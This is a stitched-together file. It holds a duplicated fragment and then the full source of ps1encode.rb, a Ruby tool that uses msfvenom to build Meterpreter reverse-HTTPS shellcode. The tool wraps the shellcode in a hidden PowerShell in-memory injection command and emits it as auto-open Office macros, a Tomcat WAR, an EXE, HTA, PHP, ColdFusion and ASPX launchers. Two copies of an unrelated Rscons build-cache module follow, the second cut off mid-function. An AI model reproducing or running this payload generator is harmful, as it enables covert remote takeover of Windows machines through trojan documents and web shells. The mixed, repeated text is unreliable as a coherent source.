# Compile the encoded payload into a Windows .exe via a tiny C wrapper.
# Requires the MinGW cross-compiler (apt-get install mingw32).
if $lencode == "exe"
  # Determine if MinGW has been installed; support new and old MinGW system
  # paths. FIXES: `File::exists?` is deprecated (removed in Ruby 3.2);
  # the old second path had a typo ("i586-migw32msvc"); and the flag used
  # to be nil — never false — when MinGW was missing, so the
  # `if mingw == false` guard below could never fire.
  mingw = File.exist?('/usr/i586-mingw32msvc') || File.exist?('/usr/bin/i586-mingw32msvc')
  unless mingw
    puts "Must have MinGW installed in order to compile EXEs!!"
    puts "\n\tRun to download: apt-get install mingw32 \n"
    exit 1
  end
  powershell_encoded = gen_PS_shellcode()
  # Minimal C stub that just shells out to powershell with the payload.
  exeTEMPLATE = %{#include <stdio.h>
#include <stdlib.h>
int main()
\{
system("powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
return 0;
\}
}
  #write out to a new file
  c_file_temp = File.new("c_file_temp.c", "w")
  c_file_temp.write(exeTEMPLATE)
  c_file_temp.close
  #compiling will require MinGW installed - "apt-get install mingw32"
  puts "compiling..."
  system("i586-mingw32msvc-gcc c_file_temp.c -o final_.exe")
  system("rm c_file_temp.c")
  puts "final_.exe created!"
end
########################JAVA_ENCODE###############################
# Emit Java applet source whose init() runs the encoded payload via cmd.exe.
if $lencode == "java"
powershell_encoded = gen_PS_shellcode()
javaTEMPLATE = %{import java.applet.*;
import java.awt.*;
import java.io.*;
public class Java extends Applet \{
public void init() \{
Process f;
String cmd = "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}";
try \{
f = Runtime.getRuntime().exec(cmd);
\}
catch(IOException e) \{
e.printStackTrace();
\}
Process s;
\}
\}
}
puts javaTEMPLATE
end
######################PHP_ENCODE###############################
# Emit a PHP page that shells out to powershell with the encoded payload.
if $lencode == "php"
powershell_encoded = gen_PS_shellcode()
phpTEMPLATE = %{<?php
system("cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
?>
}
puts phpTEMPLATE
end
######################HTA_ENCODE###############################
# Emit an HTML Application (.hta) that launches the payload via
# WScript.Shell (window style 0 = hidden).
if $lencode == "hta"
powershell_encoded = gen_PS_shellcode()
htaTEMPLATE = %{<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0
</script>
</head>
<body>
<!-- info -->
</body>
</html>
}
puts htaTEMPLATE
end
######################CFM_ENCODE###############################
# Emit an Adobe ColdFusion cfexecute snippet that runs the payload.
if $lencode == "cfm"
powershell_encoded = gen_PS_shellcode()
cfmTEMPLATE = %{<cfexecute name = "C:\\Windows\\System32\\cmd.exe"
arguments = "/c powershell -nop -win Hidden -noni -enc #{powershell_encoded}"
timeout = "10">
</cfexecute>
}
puts cfmTEMPLATE
end
Added aspx support and updated options.
#!/usr/bin/ruby
#
# ps1encode.rb
#
# by Piotr Marszalik - peter.mars[at]outlook.com
# 05/08/2013
#
#
# Use to generate and encode a powershell based metasploit payloads.
#
#
# Available output types:
# => raw (encoded payload only - no powershell run options)
# => cmd (for use with bat files)
# => vba (for use with macro trojan docs) < developed in conjunction with Ryan Reynolds
# => war (tomcat) < developed in conjuntion with Tony James
# => exe (executable) requires MinGW - i586-mingw32msvc-gcc [apt-get install mingw32]
# => java (for use with malicious java applets)
# => php (for use with php pages)
# => hta (HTML applications)
# => cfm (for use with Adobe ColdFusion)
# => aspx (for use with ASP.NET)
#
# Powershell code based on PowerSploit written by Matthew Graeber and SET by Dave Kennedy
# DETAILS - http://rvnsec.wordpress.com/2014/09/01/ps1encode-powershell-for-days/
#
require 'optparse'
require 'base64'
# CLI option parsing: collects LHOST/LPORT/PAYLOAD/ENCODE, defaulting to a
# local HTTPS meterpreter handler with cmd-style output.
options = {}
optparse = OptionParser.new do|opts|
opts.banner = "Usage: ps1encode.rb --LHOST [default = 127.0.0.1] --LPORT [default = 443] --PAYLOAD [default = windows/meterpreter/reverse_https] --ENCODE [default = cmd]"
opts.separator ""
options[:LHOST] = "127.0.0.1"
options[:LPORT] = "443"
options[:PAYLOAD] = "windows/meterpreter/reverse_https"
options[:ENCODE] = "cmd"
opts.on('-i', '--LHOST VALUE', "Local host IP address") do |i|
options[:LHOST] = i
end
opts.on('-p', '--LPORT VALUE', "Local host port number") do |p|
options[:LPORT] = p
end
opts.on('-a', '--PAYLOAD VALUE', "Payload to use") do |a|
options[:PAYLOAD] = a
end
opts.on('-t', '--ENCODE VALUE', "Output format: raw, cmd, vba, war, exe, java, php, hta, cfm, aspx") do |t|
options[:ENCODE] = t
end
opts.separator ""
end
# Print usage and quit when invoked with no arguments at all.
if ARGV.empty?
puts optparse
exit
else
optparse.parse!
end
# Globals consumed by gen_PS_shellcode and the encoder sections below.
$lhost = options[:LHOST]
$lport = options[:LPORT]
$lpayload = options[:PAYLOAD]
$lencode = options[:ENCODE]
#string byte to hex
class String
def to_hex
#"0x" + self.to_i.to_s(16)
sprintf("0x%02x", self.to_i)
end
end
# Generate raw shellcode with msfvenom, convert it to a PowerShell byte
# array literal, embed it in an in-memory injection one-liner, and return
# the result base64-encoded as UTF-16LE (the form `powershell -enc` expects).
#
# Reads the $lpayload/$lhost/$lport globals parsed from the CLI.
# Side effects: shells out to msfvenom and creates/removes the temp file
# "raw_shellcode_temp" in the current directory.
def gen_PS_shellcode()
results = []
resultsS = ""
#generate the shellcode via msfvenom and write to a temp txt file
system("msfvenom -p #{$lpayload} LHOST=#{$lhost} LPORT=#{$lport} -s 341 -f raw > raw_shellcode_temp")
#taking raw shellcode, each byte goes into array
File.open('raw_shellcode_temp').each_byte do |b|
results << b
end
#remove temp
system("rm raw_shellcode_temp")
#go through the array, convert each byte in the array to a hex string
results.each do |i|
resultsS = resultsS + i.to_s.to_hex + ","
end
#remove last unnecessary comma
resultsS = resultsS.chop
#powershell script to be executed pre-encode: VirtualAlloc + memset +
#CreateThread injection, re-invoking 32-bit powershell on 64-bit hosts
finstring = "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{resultsS};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + \"\\syswow64\\WindowsPowerShell\\v1.0\\powershell\";$cmd = \"-nop -noni -enc \";iex \"& $x86 $cmd $gq\"}else{$cmd = \"-nop -noni -enc\";iex \"& powershell $cmd $gq\";}"
#convert to UTF-16 (powershell interprets base64 of UTF-16)
ec = Encoding::Converter.new("UTF-8", "UTF-16LE")
utfEncoded = ec.convert(finstring)
#string to base64 - final
finPS = Base64.encode64(utfEncoded).gsub(/\n/, '')
return finPS
end
# Split an encoded PowerShell payload into VBA-safe 254-character string
# assignments plus a final statement that concatenates them back together.
#
# (Cleanup: removed the dead `splitup = []` initialization and the no-op
# `.flatten` — String#scan with a groupless pattern already returns a flat
# array of strings.)
#
# @param ps_shellcode [String] base64-encoded PowerShell one-liner
# @return [String] VBA source: one `stringN="..."` assignment per chunk,
#   a blank line, then `stringFinal=stringA+string0+string1+...`
#   (stringA — the powershell.exe prefix — is defined by the VBA template)
def prep_PS_chunk(ps_shellcode)
  # VBA string literals have length limits, so emit <=254-char chunks.
  chunks = ps_shellcode.scan(/.{1,254}/)
  assignments = ""
  chunk_names = []
  chunks.each_with_index do |chunk, index|
    # Strip embedded double quotes so each VBA literal stays well-formed.
    safe_chunk = chunk.tr('"', '')
    assignments << "string#{index}=\"#{safe_chunk}\"\n"
    chunk_names << "string#{index}"
  end
  final_statement = (["stringFinal=stringA"] + chunk_names).join("+")
  assignments + "\n" + final_statement
end
###########################RAW_ENCODE###########################
# Print the bare encoded payload with no powershell invocation wrapper.
puts gen_PS_shellcode() if $lencode == "raw"
##########################CMD_ENCODE###########################
if $lencode == "cmd"
  # Wrap the payload in a ready-to-paste powershell command line.
  puts "powershell -nop -win Hidden -noni -enc #{gen_PS_shellcode()}"
end
########################VBS_ENCODE###############################
# Emit a VBA macro (Auto_Open / AutoOpen / Workbook_Open entry points) that
# shells out to powershell; the payload is split into VBA-safe string chunks
# by prep_PS_chunk because VBA limits string literal length.
if $lencode == "vba"
powershell_encoded = gen_PS_shellcode()
prepped_powershell_encoded = prep_PS_chunk(powershell_encoded)
#final VBA template
vbaTEMPLATE = %{Sub Auto_Open()
stringA = "powershell.exe -NoE -NoP -NonI -W Hidden -E "
#{prepped_powershell_encoded}
Shell stringFinal, 0
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
}
puts vbaTEMPLATE
end
########################WAR_ENCODE###############################
# Build a deployable Tomcat WAR: a JSP that executes the encoded payload
# plus a minimal web.xml, packaged into sample.war via the `jar` tool.
# Side effects: creates/removes ./wartemp, writes ./sample.war.
if $lencode == "war"
powershell_encoded = gen_PS_shellcode()
warTEMPLATE = %{<%@ page import="java.io.*" %>
<html>
<head>
<title>Sample</title>
</head>
<body>
<%
String yourCommand[]=\{"cmd.exe" ,"/C", " powershell -nop -win Hidden -noni -enc #{powershell_encoded} "\};
try \{
Process p = Runtime.getRuntime().exec(yourCommand);
BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
\} catch (IOException ioe) \{
System.err.println("\\n\\n\\nIOException: "+ ioe.toString());
\}
%>
</body>
</html>
}
#web.xml - saved within WEB-INF directory
webxmlTEMPLATE = %{<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<servlet>
<servlet-name>Sample</servlet-name>
<jsp-file>/sample.jsp</jsp-file>
</servlet>
</web-app>
}
#temp dir - write in jsp file
system("mkdir wartemp")
jsp_file_temp = File.new("wartemp/sample.jsp", "w")
jsp_file_temp.write(warTEMPLATE)
jsp_file_temp.close
#new WEB-INF directory, write in web.xml
system("mkdir wartemp/WEB-INF")
webxml_file_temp = File.new("wartemp/WEB-INF/web.xml", "w")
webxml_file_temp.write(webxmlTEMPLATE)
webxml_file_temp.close
#Create JAR file
system("jar -cvf sample.war -C wartemp/ .")
#clean up
system("rm -r wartemp")
end
########################EXE_ENCODE###############################
# Compile the encoded payload into a Windows .exe via a tiny C wrapper.
# Requires the MinGW cross-compiler (apt-get install mingw32).
if $lencode == "exe"
  # Determine if MinGW has been installed; support new and old MinGW system
  # paths. FIXES: `File::exists?` is deprecated (removed in Ruby 3.2);
  # the old second path had a typo ("i586-migw32msvc"); and the flag used
  # to be nil — never false — when MinGW was missing, so the
  # `if mingw == false` guard below could never fire.
  mingw = File.exist?('/usr/i586-mingw32msvc') || File.exist?('/usr/bin/i586-mingw32msvc')
  unless mingw
    puts "Must have MinGW installed in order to compile EXEs!!"
    puts "\n\tRun to download: apt-get install mingw32 \n"
    exit 1
  end
  powershell_encoded = gen_PS_shellcode()
  # Minimal C stub that just shells out to powershell with the payload.
  exeTEMPLATE = %{#include <stdio.h>
#include <stdlib.h>
int main()
\{
system("powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
return 0;
\}
}
  #write out to a new file
  c_file_temp = File.new("c_file_temp.c", "w")
  c_file_temp.write(exeTEMPLATE)
  c_file_temp.close
  #compiling will require MinGW installed - "apt-get install mingw32"
  puts "compiling..."
  system("i586-mingw32msvc-gcc c_file_temp.c -o final_.exe")
  system("rm c_file_temp.c")
  puts "final_.exe created!"
end
########################JAVA_ENCODE###############################
# Emit Java applet source whose init() runs the encoded payload via cmd.exe.
if $lencode == "java"
powershell_encoded = gen_PS_shellcode()
javaTEMPLATE = %{import java.applet.*;
import java.awt.*;
import java.io.*;
public class Java extends Applet \{
public void init() \{
Process f;
String cmd = "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}";
try \{
f = Runtime.getRuntime().exec(cmd);
\}
catch(IOException e) \{
e.printStackTrace();
\}
Process s;
\}
\}
}
puts javaTEMPLATE
end
######################PHP_ENCODE###############################
# Emit a PHP page that shells out to powershell with the encoded payload.
if $lencode == "php"
powershell_encoded = gen_PS_shellcode()
phpTEMPLATE = %{<?php
system("cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}");
?>
}
puts phpTEMPLATE
end
######################HTA_ENCODE###############################
# Emit an HTML Application (.hta) that launches the payload via
# WScript.Shell (window style 0 = hidden).
if $lencode == "hta"
powershell_encoded = gen_PS_shellcode()
htaTEMPLATE = %{<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "cmd.exe /c powershell -nop -win Hidden -noni -enc #{powershell_encoded}", 0
</script>
</head>
<body>
<!-- info -->
</body>
</html>
}
puts htaTEMPLATE
end
######################CFM_ENCODE###############################
# Emit an Adobe ColdFusion cfexecute snippet that runs the payload.
if $lencode == "cfm"
powershell_encoded = gen_PS_shellcode()
cfmTEMPLATE = %{<cfexecute name = "C:\\Windows\\System32\\cmd.exe"
arguments = "/c powershell -nop -win Hidden -noni -enc #{powershell_encoded}"
timeout = "10">
</cfexecute>
}
puts cfmTEMPLATE
end
######################ASPX_ENCODE##############################
# Emit an ASP.NET page whose Page_Load starts powershell with the payload.
if $lencode == "aspx"
powershell_encoded = gen_PS_shellcode()
aspxTEMPLATE = %{
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Diagnostics" %>
<script runat="server">
private void Page_Load(object sender, System.EventArgs e){
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "powershell.exe";
process.StartInfo.Arguments = " -nop -win Hidden -noni -enc #{powershell_encoded}";
process.Start();
}
</script>
}
puts aspxTEMPLATE
end
|
require "digest/md5"
require "fileutils"
require "json"
require "set"
require "rscons/version"
module Rscons
# The Cache class keeps track of file checksums, build target commands and
# dependencies in a JSON file which persists from one invocation to the next.
# Example cache:
# {
# "version" => "1.2.3",
# "targets" => {
# "program" => {
# "checksum" => "A1B2C3D4",
# "command" => "13543518FE",
# "deps" => [
# {
# "fname" => "program.o",
# "checksum" => "87654321",
# },
# ],
# "user_deps" => [
# {
# "fname" => "lscript.ld",
# "checksum" => "77551133",
# },
# ],
# },
# "program.o" => {
# "checksum" => "87654321",
# "command" => "98765ABCD",
# "deps" => [
# {
# "fname" => "program.c",
# "checksum" => "456789ABC",
# },
# {
# "fname" => "program.h",
# "checksum" => "7979764643",
# },
# ],
# "user_deps" => [],
# }
# },
# "directories" => {
# "build" => true,
# "build/one" => true,
# "build/two" => true,
# },
# }
class Cache
# Name of the file to store cache information in
CACHE_FILE = ".rsconscache"
# Prefix for phony cache entries.
PHONY_PREFIX = ":PHONY:"
class << self
# Access the singleton instance.
def instance
@instance ||= Cache.new
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize
initialize!
end
# Remove the cache file.
#
# @return [void]
def clear
FileUtils.rm_f(CACHE_FILE)
initialize!
end
# Clear the cached file checksums.
#
# @return [void]
def clear_checksum_cache!
@lookup_checksums = {}
end
# Return whether the project has been configured.
#
# @return [Boolean]
# Whether the project has been configured.
def configured?
@cache["configured"]
end
# Set whether the project has been configured.
#
# @param configured [Boolean]
# Whether the project has been configured.
#
# @return [void]
def set_configured(configured)
@cache["configured"] = configured
@dirty = true
end
# Access configuration data.
def configuration_data
@cache["configuration_data"]
end
# Set configuration data.
#
# @param value [Hash]
# Configuration data.
def configuration_data=(value)
@cache["configuration_data"] = value
@dirty = true
end
# Write the cache to disk if it is dirty.
#
# @return [void]
def write
if @dirty || (@cache["version"] != VERSION)
@cache["version"] = VERSION
validate_json_object(@cache)
File.open(CACHE_FILE, "w") do |fh|
fh.puts(JSON.dump(@cache))
end
end
@dirty = false
end
# Force a write of the cache to disk.
#
# @return [void]
def write!
@dirty = true
write
end
# Check if target(s) are up to date.
#
# @param targets [Symbol, String, Array<String>]
# The name(s) of the target file(s).
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of the target's dependency files.
# @param env [Environment] The Rscons::Environment.
# @param options [Hash] Optional options.
# @option options [Boolean] :debug
# If turned on, this causes the Cache to print messages explaining why
# a build target is out of date. This could aid a builder author in
# debugging the operation of their builder.
# @option options [Boolean] :strict_deps
# Only consider a target up to date if its list of dependencies is
# exactly equal (including order) to the cached list of dependencies
#
# @return [Boolean]
# True value if the targets are all up to date, meaning that,
# for each target:
# - the target exists on disk
# - the cache has information for the target
# - the target's checksum matches its checksum when it was last built
# - the command used to build the target is the same as last time
# - all dependencies listed are also listed in the cache, or, if
# :strict_deps was given in options, the list of dependencies is
# exactly equal to those cached
# - each cached dependency file's current checksum matches the checksum
# stored in the cache file
def up_to_date?(targets, command, deps, env, options = {})
Array(targets).each do |target|
cache_key = get_cache_key(target)
unless Rscons.phony_target?(target)
# target file must exist on disk
unless File.exists?(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it does not exist on disk"
end
return false
end
end
# target must be registered in the cache
unless @cache["targets"].has_key?(cache_key)
if options[:debug]
puts "Target #{target} needs rebuilding because there is no cached build information for it"
end
return false
end
unless Rscons.phony_target?(target)
# target must have the same checksum as when it was built last
unless @cache["targets"][cache_key]["checksum"] == lookup_checksum(target)
if options[:debug]
puts "Target #{target} needs rebuilding because it has been changed on disk since being built last"
end
return false
end
end
# command used to build target must be identical
unless @cache["targets"][cache_key]["command"] == Digest::MD5.hexdigest(command.inspect)
if options[:debug]
puts "Target #{target} needs rebuilding because the command used to build it has changed"
end
return false
end
cached_deps = @cache["targets"][cache_key]["deps"] || []
cached_deps_fnames = cached_deps.map { |dc| dc["fname"] }
if options[:strict_deps]
# depedencies passed in must exactly equal those in the cache
unless deps == cached_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the :strict_deps option is given and the set of dependencies does not match the previous set of dependencies"
end
return false
end
else
# all dependencies passed in must exist in cache (but cache may have more)
unless (Set.new(deps) - Set.new(cached_deps_fnames)).empty?
if options[:debug]
puts "Target #{target} needs rebuilding because there are new dependencies"
end
return false
end
end
# set of user dependencies must match
user_deps = env.get_user_deps(target) || []
cached_user_deps = @cache["targets"][cache_key]["user_deps"] || []
cached_user_deps_fnames = cached_user_deps.map { |dc| dc["fname"] }
unless user_deps == cached_user_deps_fnames
if options[:debug]
puts "Target #{target} needs rebuilding because the set of user-specified dependency files has changed"
end
return false
end
# all cached dependencies must have their checksums match
(cached_deps + cached_user_deps).each do |dep_cache|
unless dep_cache["checksum"] == lookup_checksum(dep_cache["fname"])
if options[:debug]
puts "Target #{target} needs rebuilding because dependency file #{dep_cache["fname"]} has changed"
end
return false
end
end
end
true
end
# Store cache information about target(s) built by a builder.
#
# @param targets [Symbol, String, Array<String>]
# The name of the target(s) built.
# @param command [String, Array, Hash]
# The command used to build the target. The command parameter can
# actually be a String, Array, or Hash and could contain information
# other than just the actual command used to build the target. For the
# purposes of the Cache, any difference in the command argument will
# trigger a rebuild.
# @param deps [Array<String>] List of dependencies for the target.
# @param env [Environment] The {Rscons::Environment}.
#
# @return [void]
def register_build(targets, command, deps, env)
Array(targets).each do |target|
target_checksum = Rscons.phony_target?(target) ? "" : calculate_checksum(target)
@cache["targets"][get_cache_key(target)] = {
"command" => Digest::MD5.hexdigest(command.inspect),
"checksum" => target_checksum,
"deps" => deps.map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
"user_deps" => (env.get_user_deps(target) || []).map do |dep|
{
"fname" => dep,
"checksum" => lookup_checksum(dep),
}
end,
}
@dirty = true
end
end
# Return a list of targets that have been built.
#
# @return [Array<String>] List of targets that have been built.
def targets
@cache["targets"].keys
end
# Make any needed directories and record the ones that are created for
# removal upon a "clean" operation.
#
# @param path [String] Directory to create.
#
# @return [void]
def mkdir_p(path)
parts = path.split(/[\\\/]/)
parts.each_index do |i|
next if parts[i] == ""
subpath = File.join(*parts[0, i + 1])
unless File.exists?(subpath)
FileUtils.mkdir(subpath)
@cache["directories"][subpath] = true
@dirty = true
end
end
end
# Return a list of directories which were created as a part of the build.
#
# @return [Array<String>]
# List of directories which were created as a part of the build.
def directories
@cache["directories"].keys
end
private
# Return a String key based on the target name to use in the on-disk cache.
#
# @param target_name [Symbol, String]
# Target name.
#
# @return [String]
# Key name.
def get_cache_key(target_name)
if Rscons.phony_target?(target_name)
PHONY_PREFIX + target_name.to_s
else
target_name
end
end
# Create a Cache object and load in the previous contents from the cache
# file.
def initialize!
@cache = JSON.load(File.read(CACHE_FILE)) rescue {}
unless @cache.is_a?(Hash)
$stderr.puts "Warning: #{CACHE_FILE} was corrupt. Contents:\n#{@cache.inspect}"
@cache = {}
end
@cache["targets"] ||= {}
@cache["directories"] ||= {}
@cache["default_environment_vars"] ||= {}
@cache["configuration_data"] ||= {}
@lookup_checksums = {}
@dirty = false
end
# Return a file's checksum, or the previously calculated checksum for
# the same file.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
# Return a file's checksum, reusing a previously calculated checksum for
# the same file when one is memoized.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
def lookup_checksum(file)
  cached = @lookup_checksums[file]
  cached.nil? ? calculate_checksum(file) : cached
end
# Calculate and return a file's checksum.
#
# @param file [String] The file name.
#
# @return [String] The file's checksum.
# Calculate, memoize, and return a file's MD5 checksum.
#
# @param file [String] The file name.
#
# @return [String]
#   The file's checksum, or "" if the file cannot be read.
def calculate_checksum(file)
  @lookup_checksums[file] =
    begin
      Digest::MD5.hexdigest(File.read(file, mode: "rb"))
    rescue SystemCallError, IOError
      # Missing/unreadable files checksum as "" rather than aborting the
      # build; the previous bare `rescue` modifier also swallowed
      # programming errors (e.g. NoMethodError), which now propagate.
      ""
    end
end
# Validate that an object is one of a known set of values that can be
# serialized properly with JSON.
#
# @param o [Object]
# Object to validate.
# Validate that an object graph contains only values that serialize
# cleanly to JSON: nil, booleans, Strings, and Arrays/Hashes thereof.
# Note that Integers are deliberately rejected (the cache stores
# checksums as Strings).
#
# @param o [Object]
#   Object to validate.
#
# @raise [RuntimeError]
#   If an unexpected value type is encountered.
def validate_json_object(o)
  case o
  when Array
    o.each { |element| validate_json_object(element) }
  when Hash
    # Each key/value pair is validated as a two-element Array.
    o.each { |*pair| validate_json_object(pair) }
  when NilClass, TrueClass, FalseClass, String
    # Primitive JSON-safe value; nothing to check.
  else
    raise "Unexpected cache value for serialization: #{o.inspect}"
  end
end
end
end
cache: remove obsolete "default_environment_vars" entry
require "digest/md5"
require "fileutils"
require "json"
require "set"
require "rscons/version"
module Rscons
# The Cache class keeps track of file checksums, build target commands and
# dependencies in a JSON file which persists from one invocation to the next.
# Example cache:
# {
# "version" => "1.2.3",
# "targets" => {
# "program" => {
# "checksum" => "A1B2C3D4",
# "command" => "13543518FE",
# "deps" => [
# {
# "fname" => "program.o",
# "checksum" => "87654321",
# },
# ],
# "user_deps" => [
# {
# "fname" => "lscript.ld",
# "checksum" => "77551133",
# },
# ],
# },
# "program.o" => {
# "checksum" => "87654321",
# "command" => "98765ABCD",
# "deps" => [
# {
# "fname" => "program.c",
# "checksum" => "456789ABC",
# },
# {
# "fname" => "program.h",
# "checksum" => "7979764643",
# },
# ],
# "user_deps" => [],
# }
# },
# "directories" => {
# "build" => true,
# "build/one" => true,
# "build/two" => true,
# },
# }
class Cache
  # Name of the file to store cache information in
  CACHE_FILE = ".rsconscache"

  # Prefix for phony cache entries.
  PHONY_PREFIX = ":PHONY:"

  class << self
    # Access the singleton instance.
    def instance
      @instance ||= Cache.new
    end
  end

  # Create a Cache object and load in the previous contents from the cache
  # file.
  def initialize
    initialize!
  end

  # Remove the cache file.
  #
  # @return [void]
  def clear
    FileUtils.rm_f(CACHE_FILE)
    initialize!
  end

  # Clear the cached file checksums.
  #
  # @return [void]
  def clear_checksum_cache!
    @lookup_checksums = {}
  end

  # Return whether the project has been configured.
  #
  # @return [Boolean]
  #   Whether the project has been configured.
  def configured?
    @cache["configured"]
  end

  # Set whether the project has been configured.
  #
  # @param configured [Boolean]
  #   Whether the project has been configured.
  #
  # @return [void]
  def set_configured(configured)
    @cache["configured"] = configured
    @dirty = true
  end

  # Access configuration data.
  def configuration_data
    @cache["configuration_data"]
  end

  # Set configuration data.
  #
  # @param value [Hash]
  #   Configuration data.
  def configuration_data=(value)
    @cache["configuration_data"] = value
    @dirty = true
  end

  # Write the cache to disk if it is dirty.
  #
  # @return [void]
  def write
    if @dirty || (@cache["version"] != VERSION)
      @cache["version"] = VERSION
      validate_json_object(@cache)
      File.open(CACHE_FILE, "w") do |fh|
        fh.puts(JSON.dump(@cache))
      end
    end
    @dirty = false
  end

  # Force a write of the cache to disk.
  #
  # @return [void]
  def write!
    @dirty = true
    write
  end

  # Check if target(s) are up to date.
  #
  # @param targets [Symbol, String, Array<String>]
  #   The name(s) of the target file(s).
  # @param command [String, Array, Hash]
  #   The command used to build the target. The command parameter can
  #   actually be a String, Array, or Hash and could contain information
  #   other than just the actual command used to build the target. For the
  #   purposes of the Cache, any difference in the command argument will
  #   trigger a rebuild.
  # @param deps [Array<String>] List of the target's dependency files.
  # @param env [Environment] The Rscons::Environment.
  # @param options [Hash] Optional options.
  # @option options [Boolean] :debug
  #   If turned on, this causes the Cache to print messages explaining why
  #   a build target is out of date. This could aid a builder author in
  #   debugging the operation of their builder.
  # @option options [Boolean] :strict_deps
  #   Only consider a target up to date if its list of dependencies is
  #   exactly equal (including order) to the cached list of dependencies
  #
  # @return [Boolean]
  #   True value if the targets are all up to date, meaning that,
  #   for each target:
  #   - the target exists on disk
  #   - the cache has information for the target
  #   - the target's checksum matches its checksum when it was last built
  #   - the command used to build the target is the same as last time
  #   - all dependencies listed are also listed in the cache, or, if
  #     :strict_deps was given in options, the list of dependencies is
  #     exactly equal to those cached
  #   - each cached dependency file's current checksum matches the checksum
  #     stored in the cache file
  def up_to_date?(targets, command, deps, env, options = {})
    Array(targets).each do |target|
      cache_key = get_cache_key(target)
      unless Rscons.phony_target?(target)
        # target file must exist on disk
        # (File.exist? replaces File.exists?, removed in Ruby 3.2)
        unless File.exist?(target)
          if options[:debug]
            puts "Target #{target} needs rebuilding because it does not exist on disk"
          end
          return false
        end
      end
      # target must be registered in the cache
      unless @cache["targets"].has_key?(cache_key)
        if options[:debug]
          puts "Target #{target} needs rebuilding because there is no cached build information for it"
        end
        return false
      end
      unless Rscons.phony_target?(target)
        # target must have the same checksum as when it was built last
        unless @cache["targets"][cache_key]["checksum"] == lookup_checksum(target)
          if options[:debug]
            puts "Target #{target} needs rebuilding because it has been changed on disk since being built last"
          end
          return false
        end
      end
      # command used to build target must be identical
      unless @cache["targets"][cache_key]["command"] == Digest::MD5.hexdigest(command.inspect)
        if options[:debug]
          puts "Target #{target} needs rebuilding because the command used to build it has changed"
        end
        return false
      end
      cached_deps = @cache["targets"][cache_key]["deps"] || []
      cached_deps_fnames = cached_deps.map { |dc| dc["fname"] }
      if options[:strict_deps]
        # dependencies passed in must exactly equal those in the cache
        unless deps == cached_deps_fnames
          if options[:debug]
            puts "Target #{target} needs rebuilding because the :strict_deps option is given and the set of dependencies does not match the previous set of dependencies"
          end
          return false
        end
      else
        # all dependencies passed in must exist in cache (but cache may have more)
        unless (Set.new(deps) - Set.new(cached_deps_fnames)).empty?
          if options[:debug]
            puts "Target #{target} needs rebuilding because there are new dependencies"
          end
          return false
        end
      end
      # set of user dependencies must match
      user_deps = env.get_user_deps(target) || []
      cached_user_deps = @cache["targets"][cache_key]["user_deps"] || []
      cached_user_deps_fnames = cached_user_deps.map { |dc| dc["fname"] }
      unless user_deps == cached_user_deps_fnames
        if options[:debug]
          puts "Target #{target} needs rebuilding because the set of user-specified dependency files has changed"
        end
        return false
      end
      # all cached dependencies must have their checksums match
      (cached_deps + cached_user_deps).each do |dep_cache|
        unless dep_cache["checksum"] == lookup_checksum(dep_cache["fname"])
          if options[:debug]
            puts "Target #{target} needs rebuilding because dependency file #{dep_cache["fname"]} has changed"
          end
          return false
        end
      end
    end
    true
  end

  # Store cache information about target(s) built by a builder.
  #
  # @param targets [Symbol, String, Array<String>]
  #   The name of the target(s) built.
  # @param command [String, Array, Hash]
  #   The command used to build the target. The command parameter can
  #   actually be a String, Array, or Hash and could contain information
  #   other than just the actual command used to build the target. For the
  #   purposes of the Cache, any difference in the command argument will
  #   trigger a rebuild.
  # @param deps [Array<String>] List of dependencies for the target.
  # @param env [Environment] The {Rscons::Environment}.
  #
  # @return [void]
  def register_build(targets, command, deps, env)
    Array(targets).each do |target|
      target_checksum = Rscons.phony_target?(target) ? "" : calculate_checksum(target)
      @cache["targets"][get_cache_key(target)] = {
        "command" => Digest::MD5.hexdigest(command.inspect),
        "checksum" => target_checksum,
        "deps" => deps.map do |dep|
          {
